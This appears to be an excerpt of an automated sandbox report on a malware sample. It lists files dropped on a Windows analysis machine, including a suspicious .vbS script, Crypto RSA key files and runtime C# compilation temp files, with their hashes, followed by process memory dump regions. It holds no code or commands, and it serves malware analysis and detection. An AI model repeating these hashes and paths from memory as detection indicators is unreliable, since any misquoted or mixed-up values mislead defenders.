    2fb1ec210974416e74eb2755ba7f69643b438f39

    SHA256

    896806bfe4e0bb0097b06e45ab3ab9bed02a394362936772be385cd25195ef1b

    SHA512

    67d7682e102c69170bfaeb491e11f4856704d4861edf5051392262bf1b5cd096c076972058b0f61be73d4d75739e87e0977a5135a3f7fdf6a4661241c0293653

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\0f5007522459c86e95ffcc62f32308f1_5ab270f5-f3a9-47d1-97d7-bbd50acf9955

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\0f5007522459c86e95ffcc62f32308f1_5ab270f5-f3a9-47d1-97d7-bbd50acf9955

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS

    Filesize

    136KB

    MD5

    6a8a8b5a54471fc9f8a6a4e5814aeed4

    SHA1

    7fef3d6a517e9272f322cc215413f2a9d0c8b48b

    SHA256

    4fb0afe34f0979452ec3ebf6c9879222d5d4b2b30b3b7a49fe7d13700afa2f5e

    SHA512

    7d2da03d505ea16590cc7e6d5d64816e28dce29ebc7f6e6a828189339d57f5d7f6535e7e81eb01c907b92b99ec7f7b271b5a93886cf2ddf0d0c75ebe2e10970f

  • \??\c:\Users\Admin\AppData\Local\Temp\baac1aba\CSCD7790140F6794CE1AFC858D1741BC4A9.TMP

    Filesize

    652B

    MD5

    607100fef9e8431b788c7c9c4d74f655

    SHA1

    762f5f179165969b22579b5940d23cb7c863f549

    SHA256

    86c4826822ca852cdbe137cb6e181da7c8299f5cbb178721391619eb30623313

    SHA512

    0902e5c63f7e333f4e11f92e7def384346d7ac50c5a971cb340c6026ff51083e32d322b8ed76b5c9cf7c4ba2de1780d76c0a0928db2113377c85b290bc78a418

  • \??\c:\Users\Admin\AppData\Local\Temp\baac1aba\baac1aba.0.cs

    Filesize

    461B

    MD5

    28148b3ca10a02b644b2a6fa181ec146

    SHA1

    df0d5b7b62b90d707483dcec5f080cb249ec3eaa

    SHA256

    c55559a073769857924e68d27d2de365e18a2d1af948932ae04284da226c6cc8

    SHA512

    bfe7c6e65e8e0ee0dd46973fd7c3ebd1392d8e5dac7a94c53ab0297cc95f78a57d05c00e72a3fdd65f29728181c098b90092c03338b36e7e59fa33a2a200d54d

  • \??\c:\Users\Admin\AppData\Local\Temp\baac1aba\baac1aba.cmdline

    Filesize

    369B

    MD5

    ccf9e3057047b760894a03a45b5026c7

    SHA1

    78583b12d901b49ab90cceeabf08d6bcab55086e

    SHA256

    7bc9a4c721771508f3886285cce61cac71c5268c3b598dab2e1623aa6121caa4

    SHA512

    b52c457caf768b4f00f18f5c588e3109b17460e04ecd565fc021aab512e05832b15e53bc3b718b2717c498065e6dd00dffded658b04aa6b07e2e4677af061183

  • memory/1312-101-0x0000000007CE0000-0x0000000007D7C000-memory.dmp

    Filesize

    624KB

  • memory/1312-100-0x0000000007B80000-0x0000000007CDA000-memory.dmp

    Filesize

    1.4MB

  • memory/2212-48-0x00000000078A0000-0x00000000078B4000-memory.dmp

    Filesize

    80KB

  • memory/2212-40-0x0000000007500000-0x000000000751E000-memory.dmp

    Filesize

    120KB

  • memory/2212-43-0x0000000007660000-0x000000000767A000-memory.dmp

    Filesize

    104KB

  • memory/2212-42-0x0000000007CA0000-0x000000000831A000-memory.dmp

    Filesize

    6.5MB

  • memory/2212-44-0x00000000076C0000-0x00000000076CA000-memory.dmp

    Filesize

    40KB

  • memory/2212-45-0x00000000078F0000-0x0000000007986000-memory.dmp

    Filesize

    600KB

  • memory/2212-46-0x0000000007860000-0x0000000007871000-memory.dmp

    Filesize

    68KB

  • memory/2212-47-0x0000000007890000-0x000000000789E000-memory.dmp

    Filesize

    56KB

  • memory/2212-41-0x0000000007530000-0x00000000075D3000-memory.dmp

    Filesize

    652KB

  • memory/2212-49-0x00000000079B0000-0x00000000079CA000-memory.dmp

    Filesize

    104KB

  • memory/2212-50-0x00000000078E0000-0x00000000078E8000-memory.dmp

    Filesize

    32KB

  • memory/2212-29-0x00000000074C0000-0x00000000074F2000-memory.dmp

    Filesize

    200KB

  • memory/2212-30-0x000000006D960000-0x000000006D9AC000-memory.dmp

    Filesize

    304KB

  • memory/3004-71-0x00000000072E0000-0x0000000007302000-memory.dmp

    Filesize

    136KB

  • memory/3004-6-0x0000000005100000-0x0000000005166000-memory.dmp

    Filesize

    408KB

  • memory/3004-19-0x0000000005F50000-0x0000000005F9C000-memory.dmp

    Filesize

    304KB

  • memory/3004-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp

    Filesize

    120KB

  • memory/3004-0-0x00000000710AE000-0x00000000710AF000-memory.dmp

    Filesize

    4KB

  • memory/3004-72-0x0000000008180000-0x0000000008724000-memory.dmp

    Filesize

    5.6MB

  • memory/3004-17-0x0000000005A90000-0x0000000005DE4000-memory.dmp

    Filesize

    3.3MB

  • memory/3004-79-0x00000000710A0000-0x0000000071850000-memory.dmp

    Filesize

    7.7MB

  • memory/3004-7-0x00000000058F0000-0x0000000005956000-memory.dmp

    Filesize

    408KB

  • memory/3004-65-0x00000000064E0000-0x00000000064E8000-memory.dmp

    Filesize

    32KB

  • memory/3004-1-0x0000000002610000-0x0000000002646000-memory.dmp

    Filesize

    216KB

  • memory/3004-5-0x0000000005060000-0x0000000005082000-memory.dmp

    Filesize

    136KB

  • memory/3004-3-0x00000000710A0000-0x0000000071850000-memory.dmp

    Filesize

    7.7MB

  • memory/3004-2-0x00000000052C0000-0x00000000058E8000-memory.dmp

    Filesize

    6.2MB

  • memory/3004-4-0x00000000710A0000-0x0000000071850000-memory.dmp

    Filesize

    7.7MB

  • memory/3396-89-0x0000000005E40000-0x0000000006194000-memory.dmp

    Filesize

    3.3MB

  • memory/4732-102-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4732-103-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4732-127-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4732-135-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.